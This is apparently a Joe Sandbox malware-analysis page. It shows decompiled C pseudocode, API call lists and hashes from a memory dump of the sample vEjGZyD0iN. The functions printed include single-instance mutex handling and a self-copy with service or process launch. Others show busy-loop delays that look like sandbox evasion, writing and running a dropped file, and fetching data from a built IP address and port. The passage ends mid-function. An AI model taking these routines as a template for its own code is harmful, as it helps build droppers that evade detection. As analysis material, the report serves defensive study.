Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeLibraryLoad$AllocateDirectoryWindows
String ID:
API String ID: 357832750-0
Opcode ID: d4760ef1f788777390ee05e29e3eb7eefd64eeef550cbfbb1e7c49b33653bfc3
Instruction ID: 8836c025cb49b16b318affb0b87c664fd81edb97f608918f49530ee53cbf99b8
Opcode Fuzzy Hash: d4760ef1f788777390ee05e29e3eb7eefd64eeef550cbfbb1e7c49b33653bfc3
Instruction Fuzzy Hash: D651A675F40325BBEE2067E4AC0DF9F3ADCEB5130AF141014F906AB2C5D6719E058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 013E9060, Relevance: 34.7, APIs: 23, Instructions: 160
memorysynchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E013E9060(void* __eflags) {
				void* _v8;
				char _v12;
				short _v140;
				short _v268;
				short _v396;
				long _t31;
				void* _t45;
				void* _t47;
				long _t50;
				long _t57;
				int _t59;
				signed int _t60;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t59 = 0;
				memset(0x13ec284, 0, 0x18);
				_t60 = 0x13e1364;
				_t2 = _t59 + 0xc; // 0xc
				E013E1830(0x13e1364, _t2, 0x4a604ebc,  &_v8);
				_t67 = _v8;
				 *0x13ec200( &_v140, 0x40, _t67,  *0x13ec27c);
				HeapFree(GetProcessHeap(), 0, _t67);
				_t66 = CreateMutexW(0, 0,  &_v140);
				if(_t66 == 0) {
					L12:
					 *0x13ec0b8( *0x13ec288);
					 *0x13ec064( *0x13ec28c);
					 *0x13ec064( *0x13ec290);
					 *0x13ec08c( *0x13ec284, 0);
					E013E8AA0();
					return E013EA750(_t60 | 0xffffffff);
				}
				_t31 = WaitForSingleObject(_t66, 0);
				if(_t31 == 0 || _t31 == 0x80) {
					E013E1830(0x13e1258, 0xc, 0x4a604ebc,  &_v8);
					_t68 = _v8;
					 *0x13ec200( &_v396, 0x40, _t68,  *0x13ec27c);
					HeapFree(GetProcessHeap(), 0, _t68);
					_t60 = 0x13e1264;
					E013E1830(0x13e1264, 0xc, 0x4a604ebc,  &_v8);
					_t69 = _v8;
					 *0x13ec200( &_v268, 0x40, _t69,  *0x13ec27c);
					HeapFree(GetProcessHeap(), 0, _t69);
					_t45 = CreateMutexW(0, 0,  &_v268);
					 *0x13ec2a0 = _t45;
					if(_t45 == 0) {
						goto L12;
					}
					_t47 = CreateEventW(0, 0, 0,  &_v396);
					 *0x13ec29c = _t47;
					if(_t47 != 0) {
						_t57 = SignalObjectAndWait(_t47,  *0x13ec2a0, 0xffffffff, 0);
						if(_t57 == 0 || _t57 == 0x80) {
							_t59 = ResetEvent( *0x13ec29c);
						}
					}
					ReleaseMutex(_t66);
					CloseHandle(_t66);
					if(_t59 != 0) {
						_t50 = GetTickCount();
						_push(0x10);
						_push(0x3e8);
						_push(0x3e8);
						_push(0);
						 *0x13ec280 = 1;
						_push(E013E8DD0);
						 *0x13ec278 = _t50 + 0x3e8;
						_push(0);
						_push( &_v12);
						if( *0x13ec0ec() != 0) {
							WaitForSingleObject( *0x13ec29c, 0xffffffff);
							 *0x13ec138(0, _v12, 0xffffffff);
						}
						CloseHandle( *0x13ec29c);
					}
				}
			}

0x013e906e
0x013e9076
0x013e907f
0x013e908a
0x013e908d
0x013e9098
0x013e90a5
0x013e90b7
0x013e90cc
0x013e90d0
0x013e924f
0x013e9255
0x013e9261
0x013e926d
0x013e927b
0x013e9281
0x013e9294
0x013e9294
0x013e90d8
0x013e90e0
0x013e9100
0x013e910b
0x013e9118
0x013e912b
0x013e913f
0x013e9144
0x013e914f
0x013e915c
0x013e916f
0x013e9180
0x013e9186
0x013e918d
0x00000000
0x00000000
0x013e91a0
0x013e91a6
0x013e91ad
0x013e91ba
0x013e91c2
0x013e91d7
0x013e91d7
0x013e91c2
0x013e91da
0x013e91e1
0x013e91e9
0x013e91eb
0x013e91f1
0x013e91f3
0x013e91f8
0x013e91fd
0x013e9204
0x013e920e
0x013e9213
0x013e921b
0x013e921d
0x013e9226
0x013e9230
0x013e923d
0x013e923d
0x013e9249
0x013e9249
0x013e91e9

APIs

memset.NTDLL ref: 013E9076

Part of subcall function 013E1830: GetProcessHeap.KERNEL32(00000008,013E9F6B,00000000,00000000,013E1004,?,013E15F4,4DBAC13F,013E9F6B,?,00000000), ref: 013E1844
Part of subcall function 013E1830: RtlAllocateHeap.NTDLL(00000000,?,013E15F4), ref: 013E184B

_snwprintf.NTDLL ref: 013E90A5
GetProcessHeap.KERNEL32(00000000,013E9315), ref: 013E90B0
HeapFree.KERNEL32(00000000), ref: 013E90B7
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 013E90C6
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 013E90D8
_snwprintf.NTDLL ref: 013E9118
GetProcessHeap.KERNEL32(00000000,013E9315), ref: 013E9124
HeapFree.KERNEL32(00000000), ref: 013E912B
_snwprintf.NTDLL ref: 013E915C
GetProcessHeap.KERNEL32(00000000,013E9315), ref: 013E9168
HeapFree.KERNEL32(00000000), ref: 013E916F
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 013E9180
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 013E91A0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 013E91BA
ResetEvent.KERNEL32 ref: 013E91D1
ReleaseMutex.KERNEL32(00000000), ref: 013E91DA
CloseHandle.KERNEL32(00000000), ref: 013E91E1
GetTickCount.KERNEL32 ref: 013E91EB
CreateTimerQueueTimer.KERNEL32(?,00000000,013E8DD0,00000000,000003E8,000003E8,00000010), ref: 013E921E
WaitForSingleObject.KERNEL32(000000FF), ref: 013E9230
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 013E923D
CloseHandle.KERNEL32 ref: 013E9249

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessTimer$FreeMutexObjectWait_snwprintf$CloseEventHandleQueueSingle$AllocateCountDeleteReleaseResetSignalTickmemset
String ID:
API String ID: 3199319163-0
Opcode ID: b3d4e0207ecf01f1fe309d874bd989c12f3002b8721a5a33591f268c2b0a801a
Instruction ID: 053257b7b7c86659f40e1f25bbea944a26d1985c4295b423c7ca51bba87965ce
Opcode Fuzzy Hash: b3d4e0207ecf01f1fe309d874bd989c12f3002b8721a5a33591f268c2b0a801a
Instruction Fuzzy Hash: 8F513771940319ABEF305BA4EC4DF9E3BECEB0571AF106165FA19EA1D8DA7099408B60

Uniqueness

Uniqueness Score: -1.00%

Function 013E9620, Relevance: 31.8, APIs: 21, Instructions: 284
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E013E9620(void* __ecx, void* __edx) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				long _v46;
				struct _PROCESS_INFORMATION _v52;
				WCHAR* _v56;
				intOrPtr _v60;
				void _v64;
				void* _v68;
				struct _STARTUPINFOW _v140;
				short _v660;
				int _t56;
				void* _t64;
				long _t71;
				void* _t74;
				signed int _t103;
				long _t115;
				void* _t119;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				intOrPtr* _t129;

				_t56 = lstrcmpiW(0x13ec9c8, 0x13ec7c0);
				if(_t56 != 0) {
					E013E18D0();
					memset( &_v660, 0, 0x208);
					memset( &_v64, 0, 0x1e);
					_v60 = 1;
					_v56 = 0x13ec9c8;
					_v52.hThread = 0xe14;
					_v52.hProcess = 0x13ec7c0;
					_t64 =  *0x13ec218( &_v64);
					if(_t64 != 0 || _v46 != _t64) {
						GetTempPathW(0x104,  &_v660);
						GetTempFileNameW( &_v660, 0, 0,  &_v660);
						_v56 = 0x13ec7c0;
						_v52.hProcess =  &_v660;
						_v46 = 0;
						_t71 =  *0x13ec218( &_v64);
						if(_t71 != 0 || _v46 != _t71) {
							goto L35;
						} else {
							_v46 = _t71;
							_v56 = 0x13ec9c8;
							_v52.hProcess = 0x13ec7c0;
							_t74 =  *0x13ec218( &_v64);
							if(_t74 != 0 || _v46 != _t74) {
								goto L35;
							} else {
								goto L8;
							}
						}
					} else {
						L8:
						E013E1970();
						if(( *0x13ec2a4 & 0x00000001) == 0) {
							memset( &_v140, 0, 0x44);
							_v140.cb = 0x44;
							_v140.dwFlags = 0x80;
							if(CreateProcessW(0x13ec7c0, 0, 0, 0, 0, 0, 0, 0,  &_v140,  &_v52) != 0) {
								CloseHandle(_v52);
								CloseHandle(_v52.hThread);
							}
							goto L35;
						} else {
							_t125 =  *0x13ec040(0, 0, 6);
							_v28 = _t125;
							if(_t125 == 0) {
								L35:
								return 1;
							} else {
								_t127 =  *0x13ec0c0(_t125, 0x13ec3b0, 0x13ec3b0, 0x12, 0x10, 2, 0, 0x13ec7c0, 0, 0, 0, 0, 0);
								_v24 = _t127;
								if(_t127 != 0) {
									_push(0);
									_push(0);
									_v12 = 0;
									_push( &_v32);
									_push( &_v20);
									_push(0);
									_push(0);
									_push(3);
									_push(0x30);
									_push(0);
									_push(_t125);
									if( *0x13ec054() == 0 && GetLastError() == 0xea) {
										_t119 = RtlAllocateHeap(GetProcessHeap(), 8, _v20);
										_v68 = _t119;
										if(_t119 != 0) {
											_push(0);
											_push(0);
											_push( &_v32);
											_push( &_v20);
											_push(_v20);
											_push(_t119);
											_push(3);
											_push(0x30);
											_push(0);
											_push(_t125);
											if( *0x13ec054() == 0) {
												_t120 = _v16;
											} else {
												_t103 =  *0x13ec3ac; // 0x0
												_t123 = _v32 * 0x2c + _t119;
												_v16 = _t123;
												_t120 = _v16;
												_t129 =  <  ? (_t103 & 0x0000000f) * 0x2c + _t119 : _t119;
												while(_t129 < _t123) {
													_t126 =  *0x13ec088(_t125,  *_t129, 1);
													if(_t126 != 0) {
														_push( &_v8);
														_push(0);
														_push(0);
														_push(1);
														_push(_t126);
														if( *0x13ec0b0() == 0 && GetLastError() == 0x7a) {
															_t120 = RtlAllocateHeap(GetProcessHeap(), 8, _v8);
															if(_t120 != 0) {
																_t115 =  *0x13ec0b0(_t126, 1, _t120, _v8,  &_v8);
																_v12 = _t115;
																if(_t115 == 0) {
																	HeapFree(GetProcessHeap(), _t115, _t120);
																}
															}
														}
														 *0x13ec0a8(_t126);
													}
													_t125 = _v28;
													_t129 = _t129 + 0x2c;
													_t123 = _v16;
													if(_v12 == 0) {
														continue;
													}
													break;
												}
												_t127 = _v24;
											}
											HeapFree(GetProcessHeap(), 0, _v68);
											if(_v12 != 0) {
												 *0x13ec090(_t127, 1, _t120);
												HeapFree(GetProcessHeap(), 0, _t120);
											}
										}
									}
								} else {
									_t127 =  *0x13ec088(_t125, 0x13ec3b0, 0x10);
								}
								if(_t127 != 0) {
									 *0x13ec048(_t127, 0, 0);
									 *0x13ec0a8(_t127);
								}
								 *0x13ec0a8(_t125);
								return 1;
							}
						}
					}
				} else {
					return _t56;
				}
			}

0x013e9636
0x013e963e
0x013e9647
0x013e965a
0x013e966b
0x013e9674
0x013e9680
0x013e9687
0x013e968e
0x013e9696
0x013e969e
0x013e96b5
0x013e96c7
0x013e96d3
0x013e96da
0x013e96e1
0x013e96e8
0x013e96f0
0x00000000
0x013e96ff
0x013e96ff
0x013e9706
0x013e970d
0x013e9714
0x013e971c
0x00000000
0x00000000
0x00000000
0x00000000
0x013e971c
0x013e972b
0x013e972b
0x013e972b
0x013e9737
0x013e9940
0x013e9949
0x013e9956
0x013e9980
0x013e9985
0x013e998e
0x013e998e
0x00000000
0x013e973d
0x013e9749
0x013e974b
0x013e9750
0x013e9996
0x013e999f
0x013e9756
0x013e977e
0x013e9780
0x013e9785
0x013e979c
0x013e979e
0x013e97a3
0x013e97aa
0x013e97ae
0x013e97af
0x013e97b1
0x013e97b3
0x013e97b5
0x013e97b7
0x013e97b9
0x013e97c2
0x013e97eb
0x013e97ed
0x013e97f2
0x013e97f8
0x013e97fa
0x013e97ff
0x013e9803
0x013e9804
0x013e9807
0x013e9808
0x013e980a
0x013e980c
0x013e980e
0x013e9817
0x013e9930
0x013e981d
0x013e981d
0x013e982e
0x013e9832
0x013e9835
0x013e983a
0x013e9840
0x013e9853
0x013e9857
0x013e985c
0x013e985d
0x013e985f
0x013e9861
0x013e9863
0x013e986c
0x013e988b
0x013e988f
0x013e989c
0x013e98a2
0x013e98a7
0x013e98b2
0x013e98b2
0x013e98a7
0x013e988f
0x013e98b9
0x013e98b9
0x013e98bf
0x013e98c2
0x013e98c9
0x013e98cc
0x00000000
0x00000000
0x00000000
0x013e98cc
0x013e98d2
0x013e98d2
0x013e98e1
0x013e98eb
0x013e98f1
0x013e9901
0x013e9901
0x013e98eb
0x013e97f2
0x013e9787
0x013e9795
0x013e9795
0x013e9909
0x013e9910
0x013e9917
0x013e9917
0x013e991e
0x013e992f
0x013e992f
0x013e9750
0x013e9737
0x013e9646
0x013e9646
0x013e9646

APIs

lstrcmpiW.KERNEL32(013EC9C8,013EC7C0), ref: 013E9636
memset.NTDLL ref: 013E965A
memset.NTDLL ref: 013E966B
GetTempPathW.KERNEL32(00000104,?), ref: 013E96B5
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 013E96C7

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Tempmemset$FileNamePathlstrcmpi
String ID:
API String ID: 2872760765-0
Opcode ID: c0a2b67e985b89d677a585b298d10accb35eac4d14bdeb7f156bd5bb6093ce7a
Instruction ID: 10c38a3e01c7eb5fd658211288adad00e880346437ca4320bb2bf01a76407899
Opcode Fuzzy Hash: c0a2b67e985b89d677a585b298d10accb35eac4d14bdeb7f156bd5bb6093ce7a
Instruction Fuzzy Hash: B7A14E71A40319BFEB319BA4DC8DFAE7BFCAB08B09F141015FA15EA2C4D77499448B54

Uniqueness

Uniqueness Score: -1.00%

Function 013E9A90, Relevance: 25.6, APIs: 17, Instructions: 139
memoryfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E013E9A90(void* __ecx, long __edx) {
				long _v8;
				void* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v100;
				char _v228;
				short _v748;
				signed int _t28;
				int _t46;
				void* _t52;
				void* _t59;
				void* _t60;
				short _t61;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_v8 = __edx;
				_t52 = __ecx;
				memset( &_v100, 0, 0x44);
				memset( &_v28, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 0x80;
				_t61 = 0;
				do {
					if(_t61 < 0xfa00) {
						GetLastError();
					}
					_t61 = _t61 + 1;
				} while (_t61 < 0x8000000);
				_t28 = GetTickCount();
				_t7 = (_t28 & 0x0000000f) + 4; // 0x4
				E013E2240( &_v228, _t7);
				 *((short*)(_t68 + (_t28 & 0x0000000f) * 2 - 0xd8)) = 0;
				E013E1830(0x13e1370, 0xc, 0x7d1cc189,  &_v12);
				_t64 = _v12;
				 *0x13ec200( &_v748, 0x104, _t64, 0x13ec5b8,  &_v228);
				HeapFree(GetProcessHeap(), 0, _t64);
				_t65 = 0;
				do {
					if(_t65 < 0xfa00) {
						GetLastError();
					}
					_t65 = _t65 + 1;
				} while (_t65 < 0x8000000);
				_t59 = CreateFileW( &_v748, 0x40000000, 0, 0, 2, 0x80, 0);
				_t66 = 0;
				do {
					if(_t66 < 0xfa00) {
						GetLastError();
					}
					_t66 = _t66 + 1;
				} while (_t66 < 0x8000000);
				if(_t59 != 0xffffffff) {
					WriteFile(_t59, _t52, _v8,  &_v8, 0);
					CloseHandle(_t59);
				}
				_t60 = 0;
				do {
					_t67 = 0;
					do {
						if(_t67 < 0xfa00) {
							GetLastError();
						}
						_t67 = _t67 + 1;
					} while (_t67 < 0x8000000);
					_t46 = CreateProcessW( &_v748, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
					if(_t46 != 0) {
						CloseHandle(_v28);
						return CloseHandle(_v28.hThread);
					} else {
						goto L20;
					}
					L23:
					L20:
					_t60 = _t60 + 1;
					Sleep(0xc8);
				} while (_t60 < 0x10);
				return _t46;
				goto L23;
			}

0x013e9aa1
0x013e9aa7
0x013e9aa9
0x013e9ab7
0x013e9ac0
0x013e9ac7
0x013e9ace
0x013e9ad0
0x013e9ad6
0x013e9ad8
0x013e9ad8
0x013e9ade
0x013e9adf
0x013e9ae7
0x013e9af8
0x013e9afb
0x013e9b07
0x013e9b1d
0x013e9b22
0x013e9b3e
0x013e9b51
0x013e9b57
0x013e9b60
0x013e9b66
0x013e9b68
0x013e9b68
0x013e9b6e
0x013e9b6f
0x013e9b96
0x013e9b98
0x013e9ba0
0x013e9ba6
0x013e9ba8
0x013e9ba8
0x013e9bae
0x013e9baf
0x013e9bba
0x013e9bc7
0x013e9bce
0x013e9bce
0x013e9bd4
0x013e9bd6
0x013e9bd6
0x013e9bd8
0x013e9bde
0x013e9be0
0x013e9be0
0x013e9be6
0x013e9be7
0x013e9c0c
0x013e9c14
0x013e9c31
0x013e9c46
0x00000000
0x00000000
0x00000000
0x00000000
0x013e9c16
0x013e9c1b
0x013e9c1c
0x013e9c22
0x013e9c2d
0x00000000

APIs

memset.NTDLL ref: 013E9AA9
memset.NTDLL ref: 013E9AB7
GetLastError.KERNEL32 ref: 013E9AD8
GetTickCount.KERNEL32 ref: 013E9AE7
_snwprintf.NTDLL ref: 013E9B3E
GetProcessHeap.KERNEL32(00000000,?), ref: 013E9B4A
HeapFree.KERNEL32(00000000), ref: 013E9B51
GetLastError.KERNEL32 ref: 013E9B68
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 013E9B90
GetLastError.KERNEL32 ref: 013E9BA8
WriteFile.KERNEL32(00000000,?,013E8F6C,013E8F6C,00000000), ref: 013E9BC7
CloseHandle.KERNEL32(00000000), ref: 013E9BCE
GetLastError.KERNEL32 ref: 013E9BE0
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 013E9C0C
Sleep.KERNEL32(000000C8), ref: 013E9C1C

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateFileHeapProcessmemset$CloseCountFreeHandleSleepTickWrite_snwprintf
String ID:
API String ID: 2430354324-0
Opcode ID: c0f659bdb5d9c9d99f59f3bd21819848c334f46f7aebf6a8a0d476095c931af5
Instruction ID: c505cf1f8cc6a89faaace200c18de3c51c2fb774155f9cbbbc1a561523f62353
Opcode Fuzzy Hash: c0f659bdb5d9c9d99f59f3bd21819848c334f46f7aebf6a8a0d476095c931af5
Instruction Fuzzy Hash: 0F41C972940328ABEB309B94DC4DFDDBBEDEB44319F400161EA09EB1C4CB3059858B95

Uniqueness

Uniqueness Score: -1.00%

Function 013E8520, Relevance: 22.7, APIs: 15, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E013E8520(void* _a4, long* _a8) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v32;
				void* _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v188;
				void* _t42;
				signed char* _t62;
				void* _t64;
				void _t79;
				long _t82;
				long* _t83;
				signed char* _t88;
				void* _t92;
				long* _t103;
				void* _t104;
				void* _t105;

				_v32 = 0x10;
				_t42 = E013E8420( *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v24);
				_t103 = _a8;
				_v28 = _t42;
				_t83 =  &(_t103[1]);
				 *_t83 = 0;
				 *_t103 = 0;
				if(_t42 != 0) {
					if(E013E8700( &_v40,  &_v32) != 0) {
						if(E013E23F0( &_v40,  &_v12) != 0) {
							E013E1830(0x13ec020, 0xc, 0x58619fa4,  &_a4);
							_t88 =  *0x13ec298; // 0x0
							_t104 = _a4;
							 *0x13ec200( &_v188, 0x40, _t104, _t88[3] & 0x000000ff, _t88[2] & 0x000000ff, _t88[1] & 0x000000ff,  *_t88 & 0x000000ff);
							HeapFree(GetProcessHeap(), 0, _t104);
							_t62 =  *0x13ec298; // 0x0
							_push(_t88);
							_t64 = E013E1C50( &_v60,  &_v188, _t62[4] & 0x0000ffff);
							_t105 = _v12;
							if(_t64 != 0) {
								_push(_v8);
								_push(_t105);
								if(E013E1D40( &_v60) != 0) {
									if(E013E1E50( &_v60,  &_v12,  &_v8) != 0) {
										if(E013E2530( &_v12,  &_v20) != 0) {
											_t92 = _v20;
											_t79 =  *_t92;
											 *_t83 = _t79;
											if(_t79 < 0x4000000) {
												_t82 = E013E84C0(_t92 + 4, _v16 - 4, _t83);
												_t92 = _v20;
												 *_t103 = _t82;
											}
											HeapFree(GetProcessHeap(), 0, _t92);
										}
										HeapFree(GetProcessHeap(), 0, _v12);
									}
									 *0x13ec234(_v52);
								}
								 *0x13ec234(_v56);
								 *0x13ec234(_v60);
							}
							HeapFree(GetProcessHeap(), 0, 0);
							HeapFree(GetProcessHeap(), 0, _t105);
						}
						HeapFree(GetProcessHeap(), 0, _v40);
					}
					HeapFree(GetProcessHeap(), 0, _v28);
				}
				return 0 |  *_t103 != 0x00000000;
			}

0x013e8538
0x013e853f
0x013e8544
0x013e854a
0x013e854d
0x013e8550
0x013e8556
0x013e855e
0x013e8571
0x013e8588
0x013e85a1
0x013e85a6
0x013e85ac
0x013e85cc
0x013e85df
0x013e85e5
0x013e85f0
0x013e85f9
0x013e85fe
0x013e8606
0x013e860c
0x013e8612
0x013e8620
0x013e8636
0x013e8649
0x013e864b
0x013e864e
0x013e8650
0x013e8657
0x013e8663
0x013e8668
0x013e866e
0x013e866e
0x013e867a
0x013e867a
0x013e868c
0x013e868c
0x013e8695
0x013e8695
0x013e869e
0x013e86a7
0x013e86a7
0x013e86b8
0x013e86c8
0x013e86c8
0x013e86da
0x013e86da
0x013e86ec
0x013e86ec
0x013e86ff

APIs

Part of subcall function 013E8420: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 013E8468
Part of subcall function 013E8420: RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 013E846F
Part of subcall function 013E8420: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 013E8493
Part of subcall function 013E8420: HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 013E849A

Part of subcall function 013E8700: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,013E856F), ref: 013E8746
Part of subcall function 013E8700: RtlAllocateHeap.NTDLL(00000000), ref: 013E874D
Part of subcall function 013E8700: memcpy.NTDLL(00000000,?,?), ref: 013E87A9

_snwprintf.NTDLL ref: 013E85CC
GetProcessHeap.KERNEL32(00000000,?), ref: 013E85D8
HeapFree.KERNEL32(00000000), ref: 013E85DF

Part of subcall function 013E1C50: memset.NTDLL ref: 013E1C70
Part of subcall function 013E1C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 013E1C9C
Part of subcall function 013E1C50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 013E1CAE
Part of subcall function 013E1C50: RtlAllocateHeap.NTDLL(00000000), ref: 013E1CB5
Part of subcall function 013E1C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 013E1CD0
Part of subcall function 013E1C50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E1CED
Part of subcall function 013E1C50: HeapFree.KERNEL32(00000000), ref: 013E1CF4

GetProcessHeap.KERNEL32(00000000,?), ref: 013E8673
HeapFree.KERNEL32(00000000), ref: 013E867A

Part of subcall function 013E84C0: GetProcessHeap.KERNEL32(00000000,013E8668,?,?,?,013E8668,?), ref: 013E84D5
Part of subcall function 013E84C0: RtlAllocateHeap.NTDLL(00000000), ref: 013E84DC
Part of subcall function 013E84C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E84FF
Part of subcall function 013E84C0: HeapFree.KERNEL32(00000000), ref: 013E8506

GetProcessHeap.KERNEL32(00000000,?), ref: 013E8685
HeapFree.KERNEL32(00000000), ref: 013E868C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E86B1
HeapFree.KERNEL32(00000000), ref: 013E86B8
GetProcessHeap.KERNEL32(00000000,?), ref: 013E86C1
HeapFree.KERNEL32(00000000), ref: 013E86C8

Part of subcall function 013E1D40: GetProcessHeap.KERNEL32(00000000,00000000,?,013E861B), ref: 013E1DA2
Part of subcall function 013E1D40: HeapFree.KERNEL32(00000000,?,013E861B), ref: 013E1DA9

Part of subcall function 013E1E50: GetProcessHeap.KERNEL32(00000000,?,?,?,?,013E8631), ref: 013E1E89
Part of subcall function 013E1E50: RtlAllocateHeap.NTDLL(00000000), ref: 013E1E90
Part of subcall function 013E1E50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E1EFB
Part of subcall function 013E1E50: HeapFree.KERNEL32(00000000), ref: 013E1F02

GetProcessHeap.KERNEL32(00000000,?), ref: 013E86D3
HeapFree.KERNEL32(00000000), ref: 013E86DA

Part of subcall function 013E1830: GetProcessHeap.KERNEL32(00000008,013E9F6B,00000000,00000000,013E1004,?,013E15F4,4DBAC13F,013E9F6B,?,00000000), ref: 013E1844
Part of subcall function 013E1830: RtlAllocateHeap.NTDLL(00000000,?,013E15F4), ref: 013E184B

GetProcessHeap.KERNEL32(00000000,?), ref: 013E86E5
HeapFree.KERNEL32(00000000), ref: 013E86EC

Part of subcall function 013E23F0: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 013E2422
Part of subcall function 013E23F0: RtlAllocateHeap.NTDLL(00000000), ref: 013E2429
Part of subcall function 013E23F0: memcpy.NTDLL(013E8583,?,?), ref: 013E2467
Part of subcall function 013E23F0: GetProcessHeap.KERNEL32(00000000,013E8583), ref: 013E250A
Part of subcall function 013E23F0: HeapFree.KERNEL32(00000000), ref: 013E2511

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate$ByteCharMultiWidememcpy$_snwprintfmemset
String ID:
API String ID: 876682111-0
Opcode ID: acd6d6e7795a66ed4b7bbe79f797b2a8a5226c3d984d85a789e55542b079f12e
Instruction ID: 276b1bb34aefa30afb9a1c5beabe05ca849a6bbbc5026403e90e3139839f467f
Opcode Fuzzy Hash: acd6d6e7795a66ed4b7bbe79f797b2a8a5226c3d984d85a789e55542b079f12e
Instruction Fuzzy Hash: 87512D71900315AFEF209BE4D849BEEBBBDAF08309F044454F619DA1D4EB31EA55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013E8DD0, Relevance: 21.2, APIs: 14, Instructions: 155
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E013E8DD0(void* __edx) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount();
